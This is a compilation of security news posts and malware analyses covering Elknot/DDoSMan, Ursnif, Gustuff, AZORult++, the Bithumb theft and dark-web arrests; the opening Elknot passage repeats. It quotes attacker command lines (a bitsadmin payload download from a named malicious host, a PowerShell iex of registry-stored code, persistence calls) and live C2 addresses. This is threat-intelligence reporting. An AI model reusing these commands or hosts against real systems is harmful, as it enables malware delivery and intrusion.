Reversing the C2 tool, it smells of China even if the reader is not able to translate.


Figure 6: MMD reverse of the C2 Tool

The adversary’s infrastructure is as follows (domain, IP and port):

cctybt.com.     3600 IN A 103.119.28.12 tcp/8080

193.201.224.238 tcp/8852

Located in these networks:

AS136782 | 103.119.28.0/24 | PINGTAN-AS | AP Kirin Networks, CN

AS25092 | 193.201.224.0/22 | OPATELECOM, | UA

For the full IOCs and other details of the malware, please refer to unixfreaxjp’s research at: https://imgur.com/a/57uOiTu

About the Author: 

Odisseus – Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing and development.

unixfreaxjp – team leader of the MalwareMustDie team.

Pierluigi Paganini

(SecurityAffairs – Elknot malware, DDoS)

The post BREAKING: new update about DDoS’er Linux/DDoSMan ELF malware based on Elknot appeared first on Security Affairs.

Security Affairs: New Linux/DDosMan threat emerged from an evolution of the older Elknot

The popular expert unixfreaxjp analyzed a new Chinese ELF DDoS malware, tracked as “Linux/DDoSMan”, that evolved from the Elknot malware to deliver a new ELF bot.

Non-Technical Premise

“This report is meant for incident response or Linux forensics purpose, TO HELP admin & IR folks”: with this very first sentence begins the new analysis by one of the most talented reversers of the worldwide security community, the head of the MalwareMustDie team, Mr. unixfreaxjp. The first thought that comes to mind is: while everybody is looking for “fame” and “glory”, here is someone working hard just “TO HELP”. Is there a security group greater than this?

But let’s get to the findings.

Mr. unixfreaxjp’s new analysis describes a new Chinese ELF DDoS malware, “Linux/DDoSMan”, which seems to be a new artifact that uses the old Elknot code to deliver a new ELF bot: in fact there are two new ELF bot binaries which are dropped by the Elknot Trojan (also known as ChickDDoS or Mayday).

About this attribution, Mr. unixfreaxjp comments on VirusTotal as follows: “This is the new bot client of the “DDOS manager” toolkit used by China(PRC) DoS attacker. (….) The code seems inspired from multiple source code of China basis DDoS client, like Elknot. Not xorDDoS or ChinaZ one, not a surprise since many of code shared openly.”

But what kind of malware is this Elknot Trojan? The story is well documented: in past years one project of the MalwareMustDie team was very active in monitoring the Chinese-origin ELF DDoS malware threat. Growth was very rapid at that time (Sept. 2014), as described on the MMD blog, when MMD detected 5 variants active under almost 15 panels scattered across Chinese networks.

On the MMD blog it is still possible to read: “I am quite active in supporting the team members of this project, so recently almost everyday I reverse ELF files between 5-10 binaries. They are not aiming servers with x32 or x64 architecture but the router devices that runs on Linux too.” We could say that here we have the “Mirai” idea ante litteram, two years before Mirai.

If we look at the Akamai blog, we can still find a reference to Elknot in a post from April 4, 2016 about “BillGates”, another DDoS malware whose “attack vectors available within the toolkit include: ICMP flood, TCP flood, UDP flood, SYN flood, HTTP Flood (Layer7) and DNS reflection floods. This malware is an update and reuse from the Elknot’s malware source code. It’s been detected in the wild for a few years now.” So the Akamai blog explicitly talks about Elknot, links directly to the MalwareMustDie blog, and notes, in politically correct language, that for the “botnet activity, most of the organizations are located in the Asia region”.

Going deeper into the MMD blog post on Elknot (the one about the ARM version of Elknot, with its many specific modifications reversed and reported), we find a lot of interesting information and learn a lot about Chinese malware, including the Elknot scheme.


Figure 1: The ARM version of Elknot malware on MMD blog

Inside this post we can find many considerations about the behavior of the malware and of the threat actor, such as the encryption of the binary and of the communication: “This a sign of protection, someone want to hide something, in the end that person is hiding EVERYTHING which ending up to be very suspicious 🙂 – So the binary could be packed or encrypted protection, we have many possibility.

Further details of this family of ELF malware we posted regularly in here:–>[link]”

Further details are on kernelmode.info, as referenced by Mr. unixfreaxjp in his new analysis, which can be found here: https://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483

The new Malware

But let’s go back to the new analysis: we have a combination of “new” and “old” code that is able to interact across different platforms. The ELF bot (the client) is delivered on a Linux platform, while the C&C (a Win32 PE) listens on a Windows platform, waiting for callbacks from infected bots. The new ELF is the “downloader” and “installer”, while the old Elknot code manages the configuration, statistics, threading, DDoS attacks, etc., as shown in the next figure.


Figure 2: The C2 software for Linux DDoS

Going deeper into Mr. unixfreaxjp’s analysis, we read more about the new scheme adopted in the malware configuration:

“The C2 tool is having IP node scanner and attack function to compromise weak x86?32 server secured auth, DoS attack related commands to control the botnet nodes, and the payload management tools. Other supportive samples also exist to help to distribute the Linux bot installer to be sent successfully to the compromised device, it works under control of the C2 tool. This C2 scheme is new, along with the installer / updater. The Elknot DoS ELF dropped is not new.”

But let’s see which binaries are executed and what an administrator will see, since this analysis was made to raise system administrators’ awareness:

Code execution:

execve("/tmp/upgrade");                                                 // executes the "upgrade"
execve("/bin/update-rc.d", ["update-rc.d", "python3.O", "defaults"]);  // registers the malicious task
execve("/usr/bin/chkconfig", ["chkconfig", "--add", "python3.O"]);     // persistence

What the administrator will see:

An (unknown) process whose image is visible via /proc/{PID}/cmdline, forked from an “evil” crond process (the dropped, executed and then deleted malware).

The Client Side

Looking at the client bot, we see that once the malware has infected the remote host, the installer ELF reads all server info by calling open(“/proc/{PID}/cmdline”), from which it can build a specific information header to send to the C2, using an encoding function to encrypt and decrypt the requests during the communication with the C2.

But what are the machine info and how are they collected?

Figure 3: Header of the ELF communication

This data is sent via the malware’s “fabricated” headers as follows:

Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: {SIZE OF SENT DATA}\r\n
Host: 193[.]201[.]224[.]238:8852\r\n
User-Agent: LuaSocket 3.0-rc1\r\n
TE: trailers\r\n
Connection: close, TE\r\n\r\n

and are being processed further in the C2 tool of the threat actor.

This is also new: Elknot instead always sends its data to the C2 in encoded form, with a lot of 00 padding in between.

After the initial communication, a dropped downloader is saved and executed on the infected node, and in the analysis Mr. unixfreaxjp says: “The dropped & executed downloader embedded ELF is actually the one that is responsible for the persistence setup operation too. This part hasn’t been seen in Elknot. And this is not even in the main sample file too. In THIS dropped ELF you can see well the downloader and the persistence installer in the same file.”

See the next figure for the explanation:

Figure 4: Snapshot of the Installer/downloader

In short, the same connection is reused, and the initial code that opens the connection to the C2 is also responsible for managing the update of the malware on the infected node.

“So only one dropped binary is the Elknot,” says Mr. unixfreaxjp, “Obviously, there is no DDoS functionality in the main sample ELF file or the Downloader ELF file too, the Elknot has it, and the adversary tend to use that function from the C2 tool.”

The Server Side (C2 Tool)

Regarding the C2 tool, it is a Win32 PE with the Elknot-based C2 form, along with many additional forms, as shown in Figure 2. We can see the scanner tool and the command interface used to execute code and open a shell after an attack has succeeded. With this, the threat actor can use any compromised Windows machine to manage the C2 for its attacks.

To carry out the malicious intent, the attacker needs the ELF file to send, the script to be sent to the hacked PC, and the ELF file to be installed after infection, along with its execution toolset.

To get an idea of “how the adversary work in making this toolset”, MMD has produced a very interesting video, published on YouTube, describing the techniques adopted by the Chinese threat actors.


Figure 5: MMD video on YouTube describing Chinese threat actors’ techniques for delivering malware, recorded live from a compromised server.

Reversing the C2 tool, it smells of China even if the reader is not able to translate.


Figure 6: MMD reverse of the C2 Tool

The adversary’s infrastructure is as follows (domain, IP and port):

cctybt.com.     3600 IN A 103.119.28.12 tcp/8080

193.201.224.238 tcp/8852

Located in these networks:

AS136782 | 103.119.28.0/24 | PINGTAN-AS | AP Kirin Networks, CN

AS25092 | 193.201.224.0/22 | OPATELECOM, | UA

For the full IOCs and other details of the malware, please refer to Mr. unixfreaxjp’s research at: https://imgur.com/a/57uOiTu

About the Author: 

Odisseus – Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing and development.

unixfreaxjp – team leader of the MalwareMustDie team.

Pierluigi Paganini

(SecurityAffairs – Elknot malware, DDoS)

The post New Linux/DDosMan threat emerged from an evolution of the older Elknot appeared first on Security Affairs.


Security Affairs: Security Affairs newsletter Round 207 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.


Once again thank you!

Federal Emergency Management Agency’s (FEMA) data leak exposes data of 2.3M survivors
Malware Static Analysis
Microsoft Defender APT now protects also macOS
WordPress Social Warfare plugin zero-day exploited in attacks
Anubis II – malware and afterlife
Free Tools: spotting APTs through Malware streams
Hackers raised fake tornado alarms in two Texas towns
Operation ShadowHammer – Supply-Chain attack hit ASUS users
PewDiePie ransomware obliges users to subscribe to PewDiePie YouTube channel
Telegram allows users to delete any sent/received message from both sides with no time limit
How to get back files encrypted by the Hacked Ransomware for free
iOS 12.2 update addresses some troubling vulnerabilities
Microsoft experts found high severity flaws in Huawei PCManager
The Ursnif Gangs keep Threatening Italy
Whitehat settings allow white hat hackers to Test Facebook mobile apps
A new AZORult C++ variant can establish RDP connections
Experts found 36 vulnerabilities in the LTE protocol
LUCKY ELEPHANT campaign targets South Asian governments
Norsk Hydro estimates losses between $35M – $41M in the first week after cyberattack
Operation SaboTor – Police arrested 61 vendors and buyers in the dark web
Android Trojan Gustuff capable of targeting more than 100 global banking apps, cryptocurrency and marketplace applications
ASUS fixes supply chain of Live Update tool hit in Operation ShadowHammer
Gustuff Android banking trojan targets 125+ banking, and 32 cryptocurrency apps
Lazarus APT continues to target cryptocurrency businesses with Mac malware
New Shodan Monitor service allows tracking Internet-Exposed devices
WinRAR CVE-2018-20250 flaw exploited in multiple campaigns
Commando VM – Using Windows for pen testing and red teaming
Google developer disclosed Zero-Day flaw in TP-Link SR20 Routers
Magento fixed a critical Magento SQL Injection flaw
Malware researchers decrypted the Qrypter Payload
Millions of Toyota customer records exposed in data breach
Victims of attacks in the Philippines are filing lawsuit against company enabling them
Exodus, a government malware that infected innocent victims
Expert disclosed two Zero-Day flaws in Microsoft browsers
Initial fixes for Cisco RV320 and RV325 routers were incomplete

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 207 – News of the week appeared first on Security Affairs.

Hackers stole $19 Million from Bithumb cryptocurrency exchange

A new cyber heist made the headlines: the victim is Bithumb, the South Korea-based cryptocurrency exchange, and hackers stole $19 Million.

Hackers have stolen nearly $19 million worth of cryptocurrency from Bithumb, the South Korea-based cryptocurrency exchange.

The news was first reported by Primitive Ventures’ Dovey Wan: hackers compromised a number of Bithumb’s hot EOS and XRP wallets and transferred around 3 million EOS (roughly $13 million) and 20 million XRP (~$6 million) to accounts under their control.

The crooks then transferred the stolen funds to multiple accounts they operated on other cryptocurrency exchanges, including Huobi, HitBTC, WB, and EXmo, via ChangeNow, a non-custodial crypto swap platform that has no maximum amount for crypto exchange.

Once the attack was discovered, Bithumb quickly halted deposits and withdrawals; the company also speculated that the incident involved insiders.

“About 10:15 pm on the 29th, we detected abnormal withdrawal of the company’s cryptocurrency through Bithumb’s abnormal trading monitoring system.” reads a statement published by the exchange.

“All the spilled cryptocurrency is owned by company, and all the member’s asset is under the protection of cold wallet.

According to the company’s manual, Bithumb secured all the cryptocurrency from the detection time with a cold wallet and checked them by blocking deposit and withdrawal service.

As a result of the internal inspection, it is judged that the incident is an “accident involving insiders”.”

Bithumb is conducting an intensive investigation along with KISA, Cyber Police Agency and security companies.

Bithumb was hacked multiple times in the past two years. In June 2018, the South Korean cryptocurrency exchange confirmed that hackers stole 35 billion won ($31.6 million) worth of cryptocurrency between June 19 and June 20. In July 2017, hackers stole more than $1 million in Bitcoin and Ether from the accounts of several users of the exchange.

Changpeng Zhao, CEO of the Binance cryptocurrency exchange, posted an interesting representation of the way the attackers distributed the funds after stealing them from Bithumb.

The attackers stole the private key for Bithumb’s EOS hot wallet account (g4ydomrxhege) and used it to transfer the funds to the address “ifguz3chmamg” under their control.

“We deeply apologize to our members for delaying the cryptocurrency deposit and withdrawal service,” Bithumb said.

Bithumb is currently working with major cryptocurrency exchanges and foundations in an attempt to recover the stolen coins.
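Bithumb’s statement above describes detecting the theft through an abnormal-withdrawal monitor and then blocking deposits and withdrawals. As an added illustration of that control (example code written for this page, not Bithumb’s system or code from the original article), the following Python sketch tracks per-asset outflow from a hot wallet over a rolling window and halts further withdrawals of an asset once its cap is exceeded. The caps, the window and the transfer ledger are constructed sample values, not figures from the incident.

```python
from collections import deque
from dataclasses import dataclass, field

# Rolling-window outflow caps per asset (constructed policy values for the example,
# not figures from the Bithumb incident). A real policy would be sized to normal
# hot-wallet traffic, with the bulk of reserves kept in cold storage.
OUTFLOW_CAPS = {"EOS": 50_000.0, "XRP": 500_000.0}
WINDOW_SECONDS = 3600


@dataclass
class HotWalletMonitor:
    """Tracks outbound transfers per asset and halts withdrawals for an asset once
    the outflow inside the rolling window exceeds its cap."""
    caps: dict
    window: int = WINDOW_SECONDS
    halted: set = field(default_factory=set)
    _history: dict = field(default_factory=dict)  # asset -> deque of (ts, amount)

    def record_withdrawal(self, ts: int, asset: str, amount: float):
        """Return an alert dict for a halt or a rejected withdrawal, else None."""
        if asset in self.halted:
            return {"asset": asset, "action": "rejected", "ts": ts,
                    "reason": "withdrawals halted pending investigation"}
        hist = self._history.setdefault(asset, deque())
        hist.append((ts, amount))
        # Drop transfers that have aged out of the window.
        while hist and ts - hist[0][0] > self.window:
            hist.popleft()
        total = sum(a for _, a in hist)
        cap = self.caps.get(asset)
        if cap is not None and total > cap:
            # Halt further withdrawals of this asset and alert the response team.
            self.halted.add(asset)
            return {"asset": asset, "action": "halt", "ts": ts,
                    "window_outflow": total, "cap": cap}
        return None


# Constructed transfer ledger: (seconds since start, asset, amount). The last three
# EOS transfers model a burst draining the hot wallet after a key compromise.
SAMPLE_LEDGER = [
    (0, "EOS", 1_200.0),
    (600, "EOS", 800.0),
    (1_800, "XRP", 20_000.0),
    (3_000, "EOS", 45_000.0),
    (3_005, "EOS", 10_000.0),
    (3_010, "EOS", 500.0),
]


def run_monitor(ledger=SAMPLE_LEDGER, caps=OUTFLOW_CAPS):
    """Feed a ledger through the monitor; return (monitor, list of alerts)."""
    monitor = HotWalletMonitor(caps)
    alerts = []
    for ts, asset, amount in ledger:
        alert = monitor.record_withdrawal(ts, asset, amount)
        if alert:
            alerts.append(alert)
    return monitor, alerts


if __name__ == "__main__":
    _, alerts = run_monitor()
    for a in alerts:
        print(a)
```

The first four transfers stay under the EOS cap; the fifth pushes the one-hour outflow to 57,000 EOS, which trips the halt, and the sixth is rejected outright. In production the halt would also page an operator and sweep remaining hot-wallet balances to cold storage, which is the step Bithumb’s statement describes.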

Pierluigi Paganini

(SecurityAffairs – cryptocurrency, hacking)

The post Hackers stole $19 Million from Bithumb cryptocurrency exchange appeared first on Security Affairs.

Hackers using hacked WordPress & Joomla sites to drop malware

By Waqas

Apparently, the malware attack is carried out by Russian speaking hackers. The IT security researchers at Zscaler have discovered a sophisticated malware campaign targeting websites based on WordPress and Joomla content management system (CMS). The campaign works in such a way that hackers take advantage of a hidden directory on HTTPS and exploit vulnerabilities in extensions, plugins, and themes […]

This is a post from HackRead.com Read the original post: Hackers using hacked WordPress & Joomla sites to drop malware

E Hacking News – Latest Hacker News and IT Security News: US Court Authorizes Microsoft to be in Charge of 99 Hacking Sites


Microsoft has been legally given control of 99 websites that were operated by an Iranian hacking group known as Phosphorus.

To prevent the sites from being used to carry out cyber attacks, a US court authorized Microsoft's Digital Crimes Unit to take control of the websites tied to the group, which is also known as Charming Kitten, Ajax Security Team and APT 35.

Phosphorus relies on spear-phishing to break into individuals' private accounts. The group uses social engineering to lure targets into clicking links, at times sent from fake accounts posing as familiar contacts; the link delivers malicious software that gives Phosphorus access to the victim's systems.

The goal is to gain access to sensitive data stored on the computer systems of government agencies and businesses.

In a blog post, Tom Burt, Corporate Vice President, Customer Security and Trust at Microsoft, wrote: "Its targets also include activists and journalists - especially those involved in advocacy and reporting on issues related to the Middle East,"

"Microsoft's Digital Crimes Unit (DCU) and the Microsoft Threat Intelligence Center (MSTIC) have been tracking Phosphorus since 2013,"

"Phosphorus also uses a technique, whereby it sends people an email that makes it seem as if there's a security risk to their accounts, prompting them to enter their credentials into a web form that enables the group to capture their passwords and gain access to their systems," Burt wrote in his blog post.


Commenting on the matter, Microsoft said, "The action we executed last week enabled us to take control of 99 websites and redirect traffic from infected devices to our Digital Crime Unit's sinkhole."


Microsoft seizes 99 websites used by Iranian hackers for phishing attacks

By Uzair Amir

Microsoft has announced that it has seized some key websites that Iranian hackers used for stealing sensitive information from unsuspecting users in the US as well as launching cyber attacks. Reportedly, 99 websites have been seized by Microsoft of an Iranian hacker group that is known by many names including Phosphorus, Charming Kitten and APT […]

This is a post from HackRead.com Read the original post: Microsoft seizes 99 websites used by Iranian hackers for phishing attacks

The rise of employees stealing data: how do businesses stop this from happening?

Employees currently think of stealing data, or taking corporate data with them, as a similar offence to taking paper clips home – technology, education and reassurance are required to stop

The post The rise of employees stealing data: how do businesses stop this from happening? appeared first on The Cyber Security Place.

Gustuff Android banking trojan targets 125+ banking, and 32 cryptocurrency apps

Security experts at Group-IB have detected the activity of Gustuff, a mobile Android Trojan whose potential targets include customers of leading international banks, users of cryptocurrency services, and users of popular e-commerce websites and marketplaces.

Gustuff had never been reported before. It is a new generation of malware with fully automated features designed to steal both fiat and cryptocurrency from user accounts en masse. The Trojan abuses the Android Accessibility Service, which is intended to assist people with disabilities.

Analysis of a Gustuff sample revealed that the Trojan is equipped with web fakes designed to target users of the Android apps of top international banks, including Bank of America, Bank of Scotland, J.P.Morgan, Wells Fargo, Capital One, TD Bank, PNC Bank, and of crypto services such as Bitcoin Wallet, BitPay, Cryptopay, Coinbase etc. Group-IB specialists discovered that Gustuff could potentially target users of more than 100 banking apps, including 27 in the US, 16 in Poland, 10 in Australia, 9 in Germany, and 8 in India, and users of 32 cryptocurrency apps.

Initially designed as a classic banking Trojan, Gustuff in its current version has significantly expanded its list of potential targets, which now includes, besides the Android programs of banks, crypto services and fintech companies, users of marketplace, online store, payment system and messenger apps such as PayPal, Western Union, eBay, Walmart, Skype, WhatsApp, Gett Taxi, Revolut etc.

Weapon of mass infection

Gustuff infects Android smartphones through SMS messages carrying links to a malicious Android Package (APK) file, the package format used by the Android operating system to distribute and install applications. Once a device is infected, Gustuff spreads further at the server’s command through the infected device’s contact list or the server database. Gustuff’s features are aimed at mass infections and maximum profit for its operators. Its distinctive feature is ATS (Automatic Transfer Systems), which autofills fields in legitimate mobile banking apps, cryptocurrency wallets and other apps and thereby both speeds up and scales up thefts.

The analysis of the Trojan revealed that the ATS function is implemented with the help of the Accessibility Service, which is intended for people with disabilities. Gustuff is not the first Trojan to successfully bypass security measures against interactions with other apps’ windows using Android Accessibility Service. That being said, the use of the Accessibility Service to perform ATS has so far been a relatively rare occurrence.

Once installed on the victim’s phone, Gustuff uses the Accessibility Service to interact with elements of other apps’ windows, including cryptocurrency wallets, online banking apps and messengers. The Trojan can perform a number of actions; for example, at the server’s command, Gustuff can change the values of text fields in banking apps. Using the Accessibility Service mechanism means that the Trojan can bypass the security measures banks use to protect against older generations of mobile Trojans, as well as the changes to Google’s security policy introduced in new versions of the Android OS. Moreover, Gustuff knows how to turn off Google Protect; according to the Trojan’s developer, this feature works in 70% of cases.

Gustuff can also display fake push notifications with the legitimate icons of the apps mentioned above. Clicking on a fake push notification has two possible outcomes: either a web fake downloaded from the server pops up and the user enters the requested personal or payment (card/wallet) details, or the legitimate app that purportedly displayed the notification opens, and Gustuff, at the server’s command and with the help of the Accessibility Service, automatically fills payment fields for illicit transactions.

The malware is also capable of sending information about the infected device to the C&C server, reading/sending SMS messages, sending USSD requests, launching SOCKS5 Proxy, following links, transferring files (including document scans, screenshots, photos) to the C&C server, and resetting the device to factory settings.

“In order to better protect their clients against mobile Trojans, companies need to use complex solutions which allow them to detect and prevent malicious activity without additional software installation for the end user,” says Pavel Krylov, Head of Secure Bank at Group-IB. “Signature-based detection methods should be complemented with user and application behaviour analytics. Effective cyber defence should also incorporate a system of identification for customer devices (device fingerprinting) in order to be able to detect usage of stolen account credentials from an unknown device. Another important element is cross-channel analytics that help to detect malicious activity in other channels.”

Used mainly outside Russia

Although the Trojan was developed by a Russian-speaking cybercriminal, Gustuff operates exclusively on international markets.

“All new Android Trojans offered on underground forums, including Gustuff, are designed to be used mainly outside Russia, and target customers of international companies,” says Rustam Mirkasymov, Head of Dynamic Analysis of Malware Department at Group-IB. “In Russia, after the owners of the largest Android botnets were arrested, the number of daily thefts decreased threefold, Trojans’ activity became significantly less widespread, and their developers focused on other markets. However, some hackers “patch” (modify) the Trojan samples and reuse them in their attacks on users in Russia.”

Group-IB’s Threat Intelligence system first discovered Gustuff on hacker forums in April 2018. According to its developer, nicknamed Bestoffer, Gustuff became the new, updated version of the AndyBot malware, which since November 2017 has been attacking Android phones and stealing money using web fakes disguised as the mobile apps of prominent international banks and payment systems. Gustuff is a “serious product for individuals with skills and experience”, as advertised by the Trojan’s developer. The price for leasing the “Gustuff Bot” was $800 per month. Group-IB Threat Intelligence customers were notified about Gustuff upon discovery. A team of Group-IB analysts continues to research the Trojan.

About Group-IB

Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection.

Pierluigi Paganini

(SecurityAffairs – Gustuff, Android banking Trojan)

The post Gustuff Android banking trojan targets 125+ banking, and 32 cryptocurrency apps appeared first on Security Affairs.

Security Affairs: Operation SaboTor – Police arrested 61 vendors and buyers in the dark web

Operation SaboTor – A coordinated operation conducted by law enforcement agencies from Europe, Canada, and the United States targeted vendors and buyers of illegal goods on dark web marketplaces

The international operation, dubbed Operation SaboTor, involved 17 countries, notably Germany, the Netherlands, Austria, and Portugal.

“During the course of this operation, international law enforcement agencies made 61 arrests and shut down 50 dark web accounts used for illegal activity.” reads the press release published by the Europol. “Law enforcement executed 65 search warrants, seizing 299,5 kg of drugs, 51 firearms, and over €6,2 million (almost €4 million in cryptocurrency, €2,2 million in cash, and €35 000 in gold). They also conducted 122 interviews.”

The operation resulted in the arrest of 61 people accused of trading illegal goods and the shutdown of 50 dark web accounts involved in illegal activities. The police also seized nearly 300 kilos of drugs, 51 firearms, and over €6.2 million (two-thirds in virtual currency, the rest in cash). They also conducted 122 interviews.

“Today, members of the Joint Criminal Opioid and Darknet Enforcement (J-CODE) team announce the results of Operation SaboTor, a coordinated international effort targeting drug trafficking organizations operating on the Darknet. This is J-CODE’s second coordinated action and follows the success of last year’s Operation Disarray.” reads the press release published by the FBI.

“As a result of Operation SaboTor, U.S. and international law enforcement agencies made 61 arrests and shut down 50 Darknet accounts used for illegal activity. Law enforcement executed 65 search warrants, seizing 299.5 kilograms of drugs, 51 firearms, and more than $7 million ($4.5 million in cryptocurrency, $2.48 million in cash, and $40,000 in gold).”

Operation SaboTor was conducted between January 11 and March 12, 2019; the preparation phase began in July 2018. The operation was composed of a series of separate but complementary joint operations aimed at fighting the opioid epidemic.

Investigators used information gathered in the first stage of the operation to identify 247 high-value targets and developed intelligence packages that were disseminated to the countries concerned for further handling.

Europol hopes the operation will discourage anyone who conducts illegal activities in the belief that the dark web is a place the police cannot reach.

While law enforcement shares the results of this operation, the admin of the top dark web marketplace Dream Market announced plans to shut down on April 30 after six years of activity.

Pierluigi Paganini

(SecurityAffairs – Dark Web, black marketplace)

The post Operation SaboTor – Police arrested 61 vendors and buyers in the dark web appeared first on Security Affairs.



A new AZORult C++ variant can establish RDP connections

Experts from Kaspersky observed a new C++ version of the AZORult data stealer that implements the ability to establish RDP connections.


The AZORult Trojan is one of the most popular data stealers in the Russian cybercrime underground. The AZORult stealer was first spotted in 2016 by Proofpoint, which discovered it being delivered as a secondary infection by the Chthonic banking trojan. It was later involved in many malspam attacks, but only in July 2018 did the authors release a substantially updated variant.

AZORult collects the target’s browser history, login credentials, crypto-wallet files, cookies, files from the infected system, and more.

The malware has a relatively high price tag ($100), supports broad functionality (e.g. the use of .bit domains for C&C servers, which protects the operator’s anonymity and makes the C&C server difficult to block), and performs well.

The malware is also able to download additional payloads onto the infected machines.

The C++ version was first spotted in early March 2019, experts believe it was built by acolytes of CrydBrox, the initial AZORult author, who decided to pull the plug on it after AZORult 3.2 became too widely available.

“It appears that the acolytes of CrydBrox, the very one who pulled the plug on AZORult, decided to rewrite it in C++; this version we call AZORult++.” reads the analysis published by Kaspersky. “The presence of lines containing a path to debugging files likely indicates that the malware is still in development, since developers usually try to remove such code as soon as feasible.”

The analysis of the malware reveals that AZORult++ is affected by several issues, suggesting that the project is in the very early stages of development.

Like many other threats, it first checks the language ID of the target machine and stops execution if it identifies Russian, Armenian, Azerbaijani, Belarusian, Georgian, Kazakh, Tajik, Turkmen, or Uzbek.

A more detailed analysis reveals that this C++ version is deficient compared to AZORult 3.3: it lacks the feature for stealing from many browsers and does not implement loader functionality.


The original AZORult 3.3 and AZORult++ use the same algorithm for communication with the C&C server: they share the command format, the structure and method of storing harvested data, and the encryption keys.

The malware maintains stolen data in RAM and does not write it to the hard disk to avoid detection.

The most concerning improvement for the C++ version is the ability to establish a remote connection to the compromised machines via RDP.

The malware creates a new, hidden administrator account on the machine, and sets a registry key to establish a Remote Desktop Protocol (RDP) connection.

“Despite its many flaws, the C++ version is already more threatening than its predecessor due to the ability to establish a remote connection to the desktop. Because AZORult++ is likely still in development, we should expect its functionality to expand and bugs to be eliminated, not to mention attempts to distribute it widely under a name that buyers will recognize,” Kaspersky concludes. 

Pierluigi Paganini

(SecurityAffairs – AZORult, malware)

The post A new AZORult C++ variant can establish RDP connections appeared first on Security Affairs.


E Hacking News – Latest Hacker News and IT Security News: Ukrainian cyber police again caught Russian hackers

This is not the first time the Ukrainian cyber police have announced that they unmasked a group of Russian hackers.

According to the police, the hackers created a mailbox using an anonymizer and operated from Russian territory.

It turned out that they sent fake emails on behalf of Interior Minister Arsen Avakov. The emails contained rules of conduct for police officers during the elections; in addition, the police were required to take certain actions in favor of one of the candidates.

Online, some consider the news fake. Many people know that real hackers do not even need to create a mailbox to send messages: they can connect to the police mail server and send emails directly, or do so from any other host with port 25, the SMTP port, open.

Perhaps Ukrainian citizens decided to play a joke this way: they simply installed a browser with a VPN and created a mailbox, which is enough to hide one's location. Moreover, the incident became another reason to accuse Russia of interfering in the Ukrainian presidential election.

 


The Ursnif Gangs keep Threatening Italy

Malware researchers at Cybaze-Yoroi ZLab team uncovered a new Ursnif malware campaign that reached several organizations across Italy.

Introduction

The Ursnif trojan confirms itself as one of the most active malware threats in cyberspace: in recent days, new attack attempts reached several organizations across Italy. The Cybaze-Yoroi ZLab team dissected its infection chain to keep tracking the evolution of this persistent threat, analyzing its multiple stages, each designed to evade detection and sometimes leveraging system tools to achieve the final objective: running the Ursnif payload.

Figure 1: Infection chain of Ursnif malware

Technical Analysis

Unlike previous waves, this one does not leverage steganography or heavily obfuscated PowerShell payloads. Instead, it abuses a VB script hidden in a compressed archive delivered through an innocent-looking email referencing a summons. When users click the “Decreto” hyperlink, they are redirected to a Google Drive web page that shows a fake document and invites them to click a download link.

Figure 2: Drive document “Scarica il documento”

Once the “Scarica il documento” link in the Drive document is clicked, an archive is downloaded to the victim machine from blogger[.]scentasticyoga[.]com. It embeds two different files: the first is an obfuscated Visual Basic Script (VBS) and the second is a legitimate image placed there to deceive the victim.

Figure 3: File contained in the Zip file

The VBS code is obfuscated to evade antivirus detection and to confuse the analyst: all the values are manipulated in several steps, using many mathematical operations, very long random variable names and other content encoded in Base64. The malicious routine is split into many slices that are recombined at runtime, a basic but effective evasion technique. After a first de-obfuscation pass, more readable code can be obtained.

Figure 4: Malicious VBS, obfuscated (left) and de-obfuscated (right)

In the end, the infection starts: the malware runs cmd.exe to download “eyTWUDW.exe” through the Bitsadmin utility and stores it in “%APPDATA%\Local\Temp”.

“C:\Windows\System32\cmd.exe” /c bitsadmin  /transfer msd5 /priority foreground http://blog.practicereiki.com/pagpoftrh54.php C:\Users\admin\AppData\Local\Temp/eyTWUDW.exe

Bitsadmin is a legitimate Microsoft command-line tool typically used by sysadmins to download system updates, but in recent years it has also been abused by cyber criminals to disguise malicious network activity. In this case it has been leveraged to download the next component of the infection chain from “hxxp://blog[.practicereiki[.com/pagpoftrh54[.php”.

After that, the loader runs “schtasks” to enable the execution of the “eyTWUDW.exe” payload temporarily stored in “%APPDATA%\Local\Temp”, and then downloads the next malware stage from

http[://link[.kunstsignal[.net/images/W534K5hp8zGWYvpMJkayjGf/FqWxvwp_2F/1_2BEPHtH1r_2FpG5 /o0BuA8sr5LGg /IDwj8Q6mCoq/5nK9XEb3WoD5wW/y8lJVn5t5QXZMUgDQopzF /oO58ImaZl53M5X3E/whzGq3GIOtuCnK6/o3R_2BwMMv/wAo5qeqZ/a[.avi

Through the mentioned URL it was possible to intercept the downloaded encrypted payload, which is subsequently processed by the “eyTWUDW.exe” process: after an internal decryption phase, it stores the payload into a registry key, establishing fileless persistence on the target machine.

Figure 5: Registry key set by malware

Moreover, the malware contacts the C2 again to confirm the successful infection, sending a check-in HTTP request containing parameters used to identify the malware implant:

Parameter | Value                            | Description
soft      | 3                                | Major release
version   | 214071                           | Malware software version
user      | b2861874feedbf530d08c77a9d5833de | User id of the infected machine
server    | 12                               | Server ID
id        | 822                              | Synthetic id of infected machine
crc       | 1                                | Checksum
uptime    | 235                              | Time of infection start

Table 1: Ursnif infection format

Investigating the remote host where the C2 is hosted, it turns out to have been active since 05 March 2019, shortly before the attack wave, and unknown to many AV vendors at the time of the attack, suggesting this portion of the infrastructure was specifically prepared for the Italian landscape.

At this point, “eyTWUDW.exe” runs the previously stored script through the following command, invoking PowerShell code read from the registry value “amxrters”:

powershell  iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty ‘HKCU:\Software\AppDataLow\Software\Microsoft\94502524-E302-E68A-0D08-C77A91BCEB4E’).amxrters))
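A defender-side check for the two command lines and the check-in parameters described above, written as an added example that is not part of the Yoroi report. It assumes the Table 1 parameters appear as a plain query string (in the wild they are encoded into the URL path, as the “.avi” URL above shows); the log lines, hostnames and GUID are constructed.

```python
"""Detection helpers for the Ursnif chain described in the article (added example).

Two indicators from the article are modelled: (1) the check-in request
parameters of Table 1, and (2) the two LOLBin command lines (bitsadmin
download, PowerShell iex of a registry value). Assumption: the check-in
parameters are visible as a plain query string; all sample data is constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Parameter names of the Ursnif check-in request (Table 1 in the article).
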